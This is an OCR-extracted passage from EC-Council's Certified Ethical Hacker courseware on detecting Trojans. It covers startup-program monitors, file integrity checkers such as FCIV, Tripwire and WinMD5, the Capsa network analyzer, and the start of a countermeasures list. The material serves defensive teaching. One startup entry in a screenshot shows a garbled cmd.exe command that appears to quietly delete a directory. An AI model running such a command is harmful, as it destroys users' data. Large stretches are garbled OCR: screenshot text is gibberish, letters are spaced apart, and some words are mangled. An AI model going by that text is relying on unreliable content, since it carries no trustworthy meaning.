  • 149. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker f5 ‫־‬H Starter (Server 4.0) File Edit Configuration I Exit ‫ט‬ - 4 StJrtupl Sections ^ - B S a Piocrssn SB 6 3 a Launch 1 3 Properties ‫ג־‬ Optiom About 4 b Swvkci Name * ( 3 11 APC *k Driver Detective PI (3 0 0 dtn.exe ElcomSoft DPR S.g EMET Notrfief i * EPSON UD START B 6 FLBdckup 0 <^> googletilk 0 GTWhois 0 il (3 [ 3 (B (3 0 0 msnmsgr m5.exe Soagrt lO.Ink svcnet2 Title Uninstall C:User... (3 B WmfLTray Vlu ae !E s a z a E E Sc n etio O ta m e vta cza e C:Program Files (*86)Advanced Parental ControfB~ C:Pr09rem Frfes (186)Advanced Parental ControfB... C:Program Files («96)PC Drivers HeadQuartersDnv... "C:Program Files (x86)Auto-Trackerdtn.exe" C:Program Files (»86)Ekomsoft Password Recovery... C:Program Files (*86)EMETEM6T_notrf1er.exe "C:Program Files (*86)EPSON Projector EPSON US— C:Program Files (*86)New$oftware $F0Wer LockF... C:Program Files (*86) Google Google Talcgooglet... C:Program Files (*86)GeekToolsGTWho*s.ece "C:Program Files (x86)Windows LrveMessengerm... "C:Program Files (x86)ActrveTrackerm5.exe* C:Program Files (x86)TechSm*hSnagft 10 »Snag1t3... C:Windowssvcnet2Vsvcnet2.exe UnHackMe Rootkit Check C:W1ndowssystemiAcmd .exe /q /c rmdw /* /q "G ~ C:W1ndowsSysWow64' WmFLTray.exe Registry • User Run Registry ■Machine Run Registry •User Run Registry • Machine Run Registry - User Run Registry - Machine Run Registry • Machine Run Registry • Uset Run Registry ‫ ־‬Machine Run Registry - Machine Run Registry • Uset Run Registry ■Machine Run Startup All Users Registry ‫ ־‬Machine Run (k9«t‫׳‬y - Machine Run... Registry ■User RunOnce Registry ‫ ־‬User Run Yes Yes & Yes Yes Yes ‫ ׳י‬fm Yes (Back Process) (Back Process) Elcomsoft Distributed Passwc EMET Notifier (Enhanced M it EPSON US8 Display VI.40 (EP‫־‬ ‫ ' י‬Yes (Folder Lock) 13 Yes Google Talk Yes Yes Yes Yes < «a < fm Yes Yes j• Afl lections (18) Startup folders (1) ^ Current user J tt All users (1) £ * Default user Registry (17) & Current user (7) 3 Run ($) 3 RunOnce (1) S i All users (10) 3 Run (9) 3 RunOnce 3 RunOnceE... 3 RunSetvices 3 RunServKe... S4 Default user 3 Run 3 RunOnce INI files Wm.1m cl Refresh 1 B ^ Delete Edit 1 B 9 a a a Nev. I j Hdp Soagit Tray ApplKation (Folder Lock 3 Adobe Reader and Acrobat Manager / 1.6.5.0 / Adobe Reader and Acrobat Manager / Adobe Systems Incorporated FIGURE 6.60: Starter Tool Screenshot M odule 06 Page 975 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 150. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Startup Programs Monitoring Tool: Security AutoRun S e c u r ity A u to R u n d is p la y s t h e ClEH Urt t (lhj| NIm r fef K « t list of all applications that are loaded automatically when Windows starts up _ 1 ■ r j Sc rityAtou ;W - SE KK1A1 11tr to] eu u r n INM lC44/ c mns a r S -I" « o o 4 —‫י‬ - ‫־‬ N - S t a r t u p P r o g r a m s M o n i t o r i n g T o o l: S e c u r i t y A u t o R u n S o u rc e : h t t p : / / t c p m o n i t o r . a l t e r v i s t a . o r g S e c u r ity A u t o R u n a llo w s y o u t o v i e w t h e lis t o f all a p p l i c a t i o n s t h a t a re lo a d e d a u t o m a t i c a l l y w h e n W i n d o w s s t a r t s u p . Each a p p li c a t i o n is lis te d w i t h t h e d e ta ils o f its t y p e , re g is try , c o m m o n / u s e r , services, d r iv e r s list, c o m m a n d - l i n e s tr in g , p r o d u c t n a m e , f ile v e r s io n , c o m p a n y n a m e , l o c a t io n in t h e r e g is t r y o r file s y s te m , a n d m o r e . It id e n t if ie s a s p y w a r e o r a d w a r e p ro g ra m th a t runs at s ta rtu p . C o m p a t i b le o p e ra tin g s y s te m s of W in d o w s are 9 x /M E /N T /2 0 0 0 /X P /V is ta /7 . M odule 06 Page 976 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 151. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker ls Security Autonvt - [WIN MSStlC K4K4 VAdmmistMtor] is m m o o 4 A Cr rtU r uc M ¥ **») ^ */ O (I) »‫ י‬x* ¥ •lO aM ¥ ‫0כי*»כ‬ ^ ft * IMdfttf* 5 sun*fcM (l) r) #1Md n 1 | t w t «T xocu/Mm^ui | 0 • U n o j # MuafftrtroB «C /O M » A*tfT*a I ‘ t M « n # tIL6*Bnx | f O W<rTB01 > **‫* | ׳‬j *HMCU1 j v MoOu'i I 1_i Sdw /SifiOaCi _ Sart«(M rvat>-(n|| 0 I M | A **Own 1 # mwtmOmm I # 1im /»^otnct(1) | V HtM S*r*ctN ««* Crtrx* * N ‫ ״‬S V ^0 * tx y * .-X Y‫׳‬f*T *0* & ‫ ־‬rr c •« $ W fcM0 rrV* ST C »*rt0 »b 4MN *ppk*S0w l*t«r i U M i i« r « a ¥ V O •C) x O ¥ ^rOnab C ftna »y»g o J< yfw B t< <3 )l»W • :^ dw c< ^ T m rtc V ^ 0 , » • c:V r« Nn{■ r*g » «) * « o P O rrv wr* ry Q to trv C : N (■t)<ArtPo-t«< *t a po « C d w tfe ttV o *^ »*{03 4 P . tfito o fto n fc tt*■ ocw D S :.C *6 * > U v 0 ■ 4***gx :W »««‫־‬rt* 1 fc * tt.C * CW d w )m «M w : n o e »e W vc-w »0 Nrtwertt lr«w«neQnr p V ^ r S « ^ (« C h » * * * ca j/* rO x »< i) ?aloes * Sh««Ct»»Kt(0 c ♦ ‫ ׳‬instato) Components 49 m gan io ¥ wgon Q S t* r u > W 0 «r w c:fro r« N«(> )CS N r ^toC iO U80 g n « M P O PoK r P N S ‫»י‬ C V r t » X 1 * ‫ $ ׳‬yt1‫־‬ V0»^4‫׳‬y/W/ Vi f r « » V■* JP Nryca(SS C:tM r4^*4aW l*rtrram «64vX0**F'rt«• m ‫ •״ <^ ז‬h(* 6 600* U ‫ 7 ־‬M •: x)•* « .. t f-o^inHn (0 ! C U t»£ o d *♦ 6 oc^ *te o *«jp • O > tr N : C» n » e W geit.r*• : wdw7 lM ^ w itvipSrM on 4 Q>Mrl« 4 4 3) r/Q aC U l S CU i UM 3) App|r«0 lU X:ft9l*NN(1M)yMl%«nraS4r1<(t^ C 'A r« M « » rt« ^ « U yw r> K f> * /If g *Opt"* ^ T *S *a Ja a <dr ♦‫ ־‬Start* ‫.ל‬ > tt*o(0) ^ t t i k A n (} ) C Wr^eiwWDW<nWwr>r : -»«W»«.SQLw» C p tS *W ' f v # r • Vtrn N *t*So r«n r Mcrwoft 0* 0 Owgnotacs $«*0 * ‫•יוי‬ O«o» Sasc*tngrw O o Sfrw t Wt o f P * mkjp P Q Wt O O fc W rw tfp W vm P r<n 10 C x r0 h*« e ew» e m U 3 B< V ) *•mt X * 0 * H" WCo~*>n > 7• 9w4.. X f- g Nn (* 6 0‫י0ייייי‬Nutate* 9 »d, o r‫!״‬ ♦)< ‫״‬ w ’ X:1 0 w N tC m nNe 0 e ^$ s d y c ^ y ■ e o ie » f4 e e h n v * v Hn (»M p M *•**4 **«’ :r«ttU «Y « X:*o*•‫ ״‬H"0*9V*W M w f Q K o f Q • 1 i^OOiyO C‫׳‬A 'iS• ' W o• H K tY.lO C Al.M A CM tjr SYS FIGURE 6.61: Security AutoRun Tool Screenshot M odule 06 Page 977 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 152. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Startup Programs Monitoring Tools Absolute Startup manager © Program Starter h ttp ://w w w . absolutestartup. com C EH http ://w w w .a b-tools.com ActiveStartup Disable Startup http ://w w w . hexilesoft. com h ttp ://w w w . disables tart up. com StartEd Lite http ://w w w .o u tertech .com StartupMonitor t a t h ttp ://w w w .m lin.net Startup Inspector Chameleon Startup Manager h ttp ://w w w . w indowss tartup.com http://w w w .cham eleon-m anagers.com Autoruns for Windows 1 1 1 h ttp://technet.m icrosoft.com Startup Booster h ttp ://w w w .sm artpctoo ls. com Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. S ta rtu p P r o g r a m s M o n ito r in g T o o ls A list o f S t a r tu p p r o g r a m s ‫ ׳‬m o n i t o r i n g t o o l s a re as f o l lo w s : 0 A b s o l u t e S t a r tu p m a n a g e r a v a ila b le a t h t t p : / / w w w . a b s o l u t e s t a r t u p . c o m 0 A c t iv e S t a r t u p a v a ila b le a t h t t p : / / w w w . h e x i l e s o f t . c o m 0 S ta rtE d Lite a v a ila b le a t h t t p : / / w w w . o u t e r t e c h . c o m 0 S t a r t u p In s p e c t o r a v a ila b le a t h t t p : / / w w w . w i n d o w s s t a r t u p . c o m 0 A u t o r u n s f o r W i n d o w s a v a ila b le a t h t t p : / / t e c h n e t . m i c r o s o f t . c o m 0 P r o g r a m S t a r t e r a v a ila b le a t h t t p : / / w w w . a b - t o o l s . c o m 0 D isab le S t a r tu p a v a ila b le a t h t t p : / / w w w . d i s a b l e s t a r t u p . c o m 0 S t a r t u p M o n i t o r a v a ila b le a t h t t p : / / w w w . m l i n . n e t 0 C h a m e le o n S t a r t u p M a n a g e r a v a ila b le a t h t t p : / / w w w . c h a m e l e o n - m a n a g e r s . c o m 0 S t a r t u p B o o s t e r a v a ila b le a t h t t p : / / w w w . s m a r t p c t o o l s . c o m M odule 06 Page 978 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 153. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Scanning for Suspicious Files and Folders CEH Trojans normally modify system's files and folders. Use these tools to detect system changes SIGVERIF TRIPWIRE FCIV I t is a c o m m a n d lin e u t il it y t h a t I t is a n e n t e r p r is e c la s s s y s te m I t c h e c k s in t e g r it y o f c r it ic a l file s c o m p u te s M D 5 o r S H A 1 in t e g r it y v e r if ie r t h a t s c a n s a n d t h a t h a v e b e e n d ig it a lly s ig n e d c r y p to g r a p h ic h a s h e s f o r file s r e p o r ts c r it ic a l s y s te m f ile s f o r b y M ic r o s o f t changes C : CIV>fciv.exe c:hash .txt / / File Checksum In te g rity V e rifier version 2.05. // ‫־‬tripwire. 6 b lfb 2 f7 6 c l3 9 c 8 2 2 5 3 7 3 2 e lc 8 8 2 4 c c 2 C:hash.txt Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. S c a n n in g fo r S u s p ic io u s F ile s a n d F o ld e r s U s u a lly w h e n a s y s te m g e ts i n f e c t e d b y a T r o ja n , it m o d if ie s t h e file s a n d f o l d e r s ; y o u can scan t h e file s a n d f o l d e r s w i t h t h e f o l l o w i n g t o o l s in o r d e r t o d e t e c t t h e T r o j a n s in s t a l l e d . F C IV ^ v Fi l e C h e c k s u m I n t e g r i t y V e r i f i e r (FCIV) is a u t i l i t y t h a t can a ll o w y o u t o g e n e r a t e M D 5 o r S H A -1 hash v a lu e s f o r file s t h a t can b e v e r i f i e d w i t h t h e s ta n d a r d v a lu e s t o d e t e r m i n e a n y c h a n g e in t h e m ; i f f o u n d , y o u can ru n a v e r i f i c a t i o n o f t h e file s y s te m file s a g a in s t t h e X M L d a ta b a s e t o d e t e r m i n e w h i c h file s h a v e b e e n m o d if ie d . It is a c o m m a n d - p r o m p t u t i l i t y t h a t c o m p u t e s a n d v e r ifie s c r y p t o g r a p h i c hash v a lu e s o f all y o u r c r itic a l file s a n d saves t h e v a lu e s in an X M L file d a ta b a s e . C: CIV>fciv.exe c:hash.txt // File Checksum Integrity Verifier version 2.05. // 6blfb2f76cl39c82253732elc8824cc2 c :hash.txt T r ip w ir e — ©©‫־‬ S o u rc e : h t t p : / / w w w . t r i p w i r e . c o m M odule 06 Page 979 Ethical Hacking and C ounterm easures Copyright © by EC-COUIICil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 154. Ethical Hacking and Countermeasures Trojans and Backdoors T rip w ire E n te r p r is e p r o v id e s p ro a c tiv e ly secure th e e n tire Exam 312-50 C ertified Ethical Hacker th e c o n fig u ra tio n c o n tro l c a p a b ilit ie s o rg a n iz a tio n s i n f r a s t r u c t u r e a n d e n s u r e c o m p li a n c e w i t h in te rn a l need to p o licie s, r e g u la tio n s , a n d i n d u s t r y s t a n d a r d s a n d b e n c h m a r k s . “ S IG V E R IF S o u rc e : h t t p : / / b o o k s . g o o g l e . c o . i n SIGVERIF is a s ig n a t u r e v e r i f i c a t i o n t o o l t h a t a llo w s y o u t o f i n d sig n e d a n d u n s i g n e d d r i v e r s c o n n e c t e d t o t h e s y s te m . W h e n y o u f i n d a n y u n s ig n e d d r iv e r , y o u can m o v e t h a t t o a n e w f o l d e r a n d r e s t a r t t h e s y s te m a n d t e s t t h e p r o g r a m a nd f u n c t i o n a l i t y f o r e rr o r s . T h e f o l l o w i n g a re t h e s te p s t o i d e n t i f y u n s ig n e d d riv e r s : Q Click S t a r t, click R un, t y p e SIGVERIF, a n d t h e n clic k 9 Click t h e A d v a n c e d b u t t o n . e Click t h e o t h e r file s t h a t a re n o t d ig i t a l l y s ig n e d . 9 N a v ig a te t o w i n n t s y s t e m 3 2 d r i v e r s f o l d e r a n d t h e n c lick OK. A f t e r SIGVERIF fin is h e s , it ch e cks all t h e u n s ig n e d OK. d r iv e r s a n d lists a re d is p la y e d o n t h e c o m p u t e r . T h e i n v e s t i g a t o r can fin d t h e list o f all s ig n e d a n d u n s ig n e d d r iv e r s f o u n d b y SIGVERIF in sigverif.txt in t h e %windir% f o l d e r , t y p i c a l l y t h e w i n n t o r w i n d o w s f o l d e r . M odule 06 Page 980 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 155. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Files and Folder Integrity Checker: FastSum and W i n M D 5 W1nMD5 V 2.07 (Cl 2003-2006 by eolsonS'mitedu - I‫ ! ם‬x http://www.blisstonia.com J W in M D 5 is a W in d o w s u tilit y f o r c o m p u tin g th e J These fin g e rp rin ts can be used to e n s u re th a t M D 5 h ash es ( " fin g e r p r in ts " ) o f file s th e f ile is u n c o rr u p te d http://www.fastsum.com -1 F a stS u m is u s e d f o r c h e c k in g in t e g r i t y o f t h e file s -J I t c o m p u te s c h e c k s u m s a c c o r d in g t o t h e M D 5 c h e c k s u m a lg o r it h m Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. j F ile s a n d F o ld e r I n t e g r it y C h e c k e r : F a s tS u m a n d W in M D 5 A file s a n d f o l d e r i n t e g r i t y c h e c k e r a llo w s y o u t o m o n i t o r t h e i n t e g r i t y o f fi l e s and f o l d e r s a n d c h e c k f o r a n y c h a n g e s in t h e c r itic a l file s, i n d i c a t i n g p o t e n t i a l i n t r u s io n a t t e m p t s . T h e s e w o r k w i t h a s u it e o f s e c u r it y t o o l s t o p r o v id e a c o m p l e t e a u d i t a n d m o n i t o r i n g s o lu t i o n f o r OSS a n d G u a r d ia n file s y s te m s . F a s tS u m S o u rc e : h t t p : / / w w w . f a s t s u m . c o m FastSum is b u i l t o n t h e w e l l - p r o v e n M D 5 c h e c k s u m a l g o r i t h m , w h i c h is used w o r l d w i d e f o r c h e c k in g t h e i n t e g r i t y o f t h e file s. You can ta k e c o n t r o l o f y o u r d a ta w i t h F astSum . F i n g e r p r i n t y o u r i m p o r t a n t file s n o w a n d c h e c k t h e i n t e g r i t y a f t e r a n e t w o r k t r a n s f e r o r a CD b u r n i n g s i m p l y b y t a k i n g t h e f i n g e r p r i n t s aga in a n d c o m p a r i n g t h e m w i t h t h e p r e v io u s ly m a d e o n e s . In t h e s a m e w a y , y o u can a lso fin d o u t w h e t h e r y o u r file s h ad b e e n d a m a g e d b y v iru s e s , n e t w o r k issues, o r C D / D V D b u r n i n g f a i lu r e s . M odule 06 Page 981 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 156. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker FattSum 1.7 IUnr«g>?t«f*dl t■ !(•» ft* * O m X ►* Ti O m iiN lla vffivttiliM vyiuM irttsvriiictaaiw a d *«*Kj»‫ ׳‬rfV‫׳‬r*JHy c » * « et*ta 9 n« tr of‫•זיז *•ץ‬ P m t * £•** C *5‫ ׳‬w i r » ■w m D D n cW 'e 'JfjT ' r.f*h« * ®‫ נ‬c * * jd fc 4 ) E U >/* > r w v iw V “ 1 - ‫־■— ־־־‬ * Pca#11pr® » So. Chpcxm^vfM■ « N I r.0 *U ~ *£ 1 » ^ D U«B D W H f 5 K W 4 ( ‫ ־‬C J 4 r « W « « 5 1^5 •® W 3 ’w c c € f f w ‫ו‬ 7. « ‫«€1ס?>0 מ י ל מ מ « נ ד ז5 ן ז ו ^4 מ י א‬ JBM 1 3 t3 L fU 4 tU :tlW M i2 n t2 rtM 4 4 *a 2KB 4ACaaefSlS35CS£2t37SX1«Bltft6l7 >4 •t F4J! h: E iT fl [1:>3i ' " f•‫־‬ ! P • on «« ‫י א לי‬ ‫•ו ג ד‬ A MS Ml 1‫— ?*• ד ע‬ # ] deeeopn ‫ו‬ IM {? f*M* j SMptrM C3I24 U 5iA885tA2»U«2X 1W H6* 2C W «^M EFfv!rEA«7??nR B273 U y V U 4 D U 4 .1 M M M lS « e C « U 54AS647711J7A4271Mf &Cto££E 7X& 44ji^E tfX »M 0E *juC C £*]14!1tai 5HCttOFMf DK&6E4D7562t3£X6? ?K1»*aCPClKWfiC5«CMEFE7«ll j A C*a«Ml fro K I*1 * • c«M m 0 ‫/״*י‬VXII? 64‫ ♦מ‬H P D **C «nQ »* 7 ! * * * ‫ ?־ז‬Up* ‫יי׳יי*01 וו תי‬ W * • I * ‫ ל‬W «P :UfcUrtr^ ♦» dwkMM c D iM i * 1aar,J0»714 p M M 9n Pracw 2Ha O or % 3 ‫ ■ו‬n15 & ‫א‬ ii 2 « n taav #1 ■ 1 6 £ * ‫ מ‬o 0 w«pr c0 e € Bi«r c 00« FIGURE 6 .6 2 : FastSum W in M D 5 S o u rc e : h t t p : / / w w w . b l i s s t o n i a . c o m W i n M D 5 v 2 .0 is a W i n d o w s (98, 2 0 0 0 , XP, V is ta , 7) u t i l i t y f o r c o m p u t i n g t h e M D 5 h a s h e s ( " f i n g e r p r i n t s " ) o f files. It also m a k e s it v e r y easy t o c o m p a r e t h e f i n g e r p r i n t s a g a in s t t h e c o r r e c t f i n g e r p r i n t s s t o r e d in an M D 5 S U M file . R e d H a t, f o r e x a m p le , p r o v id e s M D 5 S U M file s f o r all o f its la rg e d o w n lo a d a b le file s. T he se f i n g e r p r i n t s can be u sed to e n s u re t h a t y o u r f ile is u n c o rru p te d . WinMD5 v2.07 (C) 2003-2006 by eolson@mit.edu File Edit O ptions Help Currently Processing: (idle) Errors Found (0 items enqueued) Path | Hash MD5SUM.md5 ChangeLog.txt CorruptFile.txt README.txt WinMD5.exe Clear | Bytes aeca3c951ddeal830ebe7cebab5de8cc d73ff397a76f886e8c5a80b05223feel 63895264778b3ce92c57d0dff670f7c7 e3d78080bfc49d89113c55cf4b7c4fb4 191c7c02a3206fdca2b79941c634d2b2 Abort 192 1304 92 978 126976 | Status Loaded Good BAD Good Good Number of known md5 hashes found in MD5SUM files: 4 Drag files and MD5SUM files (if available) into this window.http ■v.v.v.‫.׳‬bl 1sston 1a cony'software !; FIGURE 6 .6 3 : W in M D 5 M odule 06 Page 982 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 157. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Files and Folder Integrity Checker Advanced Checksum Verifier (ACSV) CEH Attribute Manager http ://w w w .m iklso ft.co m h ttp:/'/w w w . irnis. net ji J 2 i p I Fsum Fronted PA File Sight y h ttp://fsum fe.sou rceforge.net h ttp ://w w w .p ow erad m in. com Verisys CSP File Integrity Checker h ttp ://w w w . ionx. co. uk h ttp ://w w w . tandem security. com € AFICK (Another File Integrity Checker) ExactFile http ://w w w .exactfile.co m h ttp ://afick.sourceforge.net File Integrity Monitoring OSSEC h ttp ://w w w . ncircle.com ^n₪ 1| Copyright © by h ttp ://w w w .o sse c.n e t EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. F ile s a n d F o ld e r I n t e g r it y C h e c k e r s ‫יי‬ Files a n d F o ld e r I n t e g r it y C h e c k e r s m o n i t o r file i n t e g r i t y a n d i d e n t i f y t h e c h a n g e s in t h e c r itic a l file s t h a t i n t i m a t e a n y p o t e n t i a l i n t r u s i o n a t t e m p t s A f e w file s a n d f o l d e r i n t e g r i t y c h e c k e rs a re lis te d as f o l lo w s : © A d v a n c e d C h e c k s u m V e r i f i e r (ACSV) a v a ila b le a t h t t p : / / w w w . i r n i s . n e t 0 Fsum F r o n te d a v a ila b le a t h t t p : / / f s u m f e . s o u r c e f o r g e . n e t 0 V e ris y s a v a ila b le a t h t t p : / / w w w . i o n x . c o . u k 0 AFICK ( A n o t h e r File I n t e g r it y C h e c k e r) a v a ila b le a t h t t p : / / a f i c k . s o u r c e f o r g e . n e t 0 File I n t e g r i t y M o n i t o r i n g a v a ila b le a t h t t p : / / w w w . n c i r c l e . c o m © A t t r i b u t e M a n a g e r a v a ila b le a t h t t p : / / w w w . m i k l s o f t . c o m © PA File S ig h t a v a ila b le a t h t t p : / / w w w . p o w e r a d m i n . c o m 0 CSP File I n t e g r it y C h e c k e r a v a ila b le a t h t t p : / / w w w . t a n d e m s e c u r i t y . c o m 0 ExactFile a v a ila b le a t h t t p : / / w w w . e x a c t f i l e . c o m 0 OSSEC a v a ila b le a t h t t p : / / w w w . o s s e c . n e t M odule 06 Page 983 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 158. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Scanning for Suspicious Network Activities J C EH Trojans connect back to handlers and send confidential inform ation to attackers J Use n etw ork scanners and packet sniffers to m onitor n e tw o rk tra ffic going to m alicious rem ote addresses J Run tools such as Capsa to m onitor n etw ork traffic and look for suspicious activities sent o ver th e w eb Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. S c a n n in g fo r S u s p ic io u s N e t w o r k A c t iv itie s A f t e r a m a l i c io u s a t t a c k , t h e T ro ja n s s t a r t s e n d in g t h e c o n f i d e n t i a l d a t a p r e s e n t o n th e s y s te m t o t h e a tta c k e r s . T ro ja n s c o n n e c t b a c k t o h a n d le r s a n d se n d c o n f i d e n t i a l i n f o r m a t i o n t o a tta c k e r s . Use n e t w o r k s c a n n e r s a n d p a c k e t s n if f e r s t o m o n i t o r n e t w o r k t r a f f i c g o in g t o m a lic io u s r e m o t e a d d re s s e s . In o r d e r t o a v o id th e s e s i t u a t i o n s , it's a lw a y s b e t t e r t o scan t h e n e t w o r k s f o r s u s p ic io u s a c tiv it ie s . W i t h t h e h e lp o f s c a n n in g u t i l i t i e s , y o u can k n o w if t h e d a ta is b e in g t r a n s f e r r e d t o a m a lic io u s r e m o t e s o u rc e . By u sin g n e t w o r k s c a n n in g t o o l s like Capsa, y o u can i d e n t i f y such a c tiv itie s . M odule 06 Page 984 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 159. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Detecting Trojans and W o r m s with Capsa Network Analyzer CEH Capsa is an intuitive network analyzer, which provides detailed information to help check if there are any Trojan activities on a network http ://w w w . colasoft. com Copyright © by EC-Coancil. All Rights Reserved. Reproduction Is Strictly Prohibited. J D e te c tin g T ro ja n s a n d W o r m s w ith C a p s a N e tw o rk A n a ly z e r S o u rc e : h t t p : / / w w w . c o l a s o f t . c o m Capsa is a n e t w o r k a n a ly z e r t h a t p r o v id e s e n o u g h i n f o r m a t i o n t o h e lp c h e c k if t h e r e is a n y T r o j a n a c t i v i t y o n a n e t w o r k . It is a p o r t a b l e n e t w o r k a n a ly z e r f o r LANs/WLANs t h a t p e r f o r m s p a c k e t c a p t u r in g , n e t w o r k m o n i t o r i n g , a d v a n c e d p r o t o c o l analysis, i n - d e p t h p a c k e t d e c o d in g , a n d a u t o m a t i c e x p e r t d ia g n o s is . F e a tu r e s o f Capsa N e t w o r k A n a l y z e r in c l u d e : © R e a l- tim e c a p t u r e and save d a ta t r a n s m i t t e d o v e r local n e tw o rks, i n c lu d in g w i r e d n e t w o r k a n d w ir e le s s n e t w o r k like 8 0 2 . 1 1 a / b / g / n Q M o n i t o r n e t w o r k b a n d w i d t h a nd usage b y c a p t u r i n g d a t a p a c k e t s t r a n s m i t t e d o v e r t h e n e t w o r k a n d p r o v id i n g s u m m a r y a n d d e c o d i n g i n f o r m a t i o n a b o u t th e s e p a c k e ts © V i e w n e t w o r k s ta tis tic s , a ll o w i n g easy c a p t u r e a nd i n t e r p r e t a t i o n o f n e t w o r k u t i li z a t i o n d a ta e M o n ito r In te rn e t, e m a il, and in s ta n t m e s s a g in g tra ffic , h e lp in g keep e m p lo y e e p ro d u c tiv ity to a m a x im u m M odule 06 Page 985 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 160. Ethical Hacking and Countermeasures Trojans and Backdoors e D ia g n o s e and p in p o in t Exam 312-50 C ertified Ethical Hacker n e tw o rk p ro b le m s in seconds by d e te c tin g and lo c a tin g s u s p ic io u s h o s ts e M a p o u t t h e d e ta ils , in c lu d in g t r a f f i c , IP a d d re s s , a n d M A C , o f e ach h o s t o n t h e n e t w o r k , a ll o w i n g f o r easy i d e n t i f i c a t i o n o f e ach h o s t a n d t h e t r a f f i c t h a t passes t h r o u g h each © V is u a liz e t h e e n t i r e n e t w o r k in an e llip s e t h a t s h o w s t h e c o n n e c t i o n s a n d t r a f f i c b e t w e e n e ach h o s t FIGURE 6.64: Detecting Trojans and Worms with Capsa Network Analyzer M odule 06 Page 986 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 161. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Copyright © by EG-C(ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. M o d u le F lo w So fa r, w e h a ve d iscu sse d v a r io u s T ro ja n s a n d t h e w a y s t h e y i n f e c t t h e s y s t e m r e s o u r c e s o r i n f o r m a t i o n s t o r e d o n t h e c o m p u t e r , as w e ll as w a y s t o d e t e c t T r o ja n s o n a c o m p u te r. Once you d e te c t a T ro ja n , you s h o u ld im m e d ia te ly d e le te it and a p p ly c o u n t e r m e a s u r e s t h a t o f f e r p r o t e c t i o n a g a in s t T r o ja n s a n d b a c k d o o rs . T h e se c o u n t e r m e a s u r e s m in i m i z e risk a n d p r o v id e c o m p l e t e p r o t e c t i o n t o t h e u s e r's s y s te m . Trojan Concepts ( !/— Trojans Infection Types of Trojans C ou n te rm e a su re s |jjp |j| Anti-Trojan Software Penetration Testing V‫— ׳‬ f 1 Trojan Detection M odule 06 Page 987 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 162. Ethical Hacking and Countermeasures Trojans and Backdoors T his s e c tio n Exam 312-50 C ertified Ethical Hacker h ig h lig h ts v a r io u s c o u n t e r m e a s u r e s t h a t p r e v e n t T r o ja n s a n d backd oo rs fr o m e n t e r i n g i n t o y o u r s y s te m . M odule 06 Page 988 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 163. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 C ertified Ethical Hacker Trojan C ounterm easures C EH A v o id o p e n in g e m a il a tta c h m e n ts re c e iv e d fro m u n k n o w n s e n d e rs A v o id a c c e p tin g th e B lo c k a ll u n n e c e s s a ry p o rts p ro g ra m s tra n s fe r r e d by a t th e h o s t a n d fir e w a ll in s ta n t m e s s a g in g H a rd e n w e a k , d e fa u lt c o n fig u ra tio n s e ttin g s D is a b le u n u s e d M o n it o r th e in te r n a l f u n c tio n a lit y in c lu d in g n e t w o r k tr a f fic f o r o d d p ro to c o ls a n d s e rv ic e s p o rts o r e n c ry p te d tr a f fic Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. T ro ja n C o u n te rm e a s u r e s A T r o ja n is a m a lic io u s p r o g r a m t h a t m a s q u e r a d e s as a g e n u i n e a p p l i c a t i o n . W h e n th e s e T r o ja n s a re a c tiv a t e d , t h e y lead t o m a n y issues such as e ra s in g d a ta , r e p la c in g d a ta o n a v i c t i m ' s c o m p u t e r , c o r r u p t i n g file s, s p r e a d in g v iru s e s , a n d s p y in g o n t h e v i c t i m ' s s y s t e m a nd s e c r e tly r e p o r t i n g t h e d a ta , r e c o r d i n g k e y s tr o k e s t o s te a l s e n s itiv e i n f o r m a t i o n such as c r e d it c a rd n u m b e r , u s e r n a m e s , p a s s w o r d s e tc. a n d o p e n i n g a b a c k d o o r o n t h e v i c t i m ' s 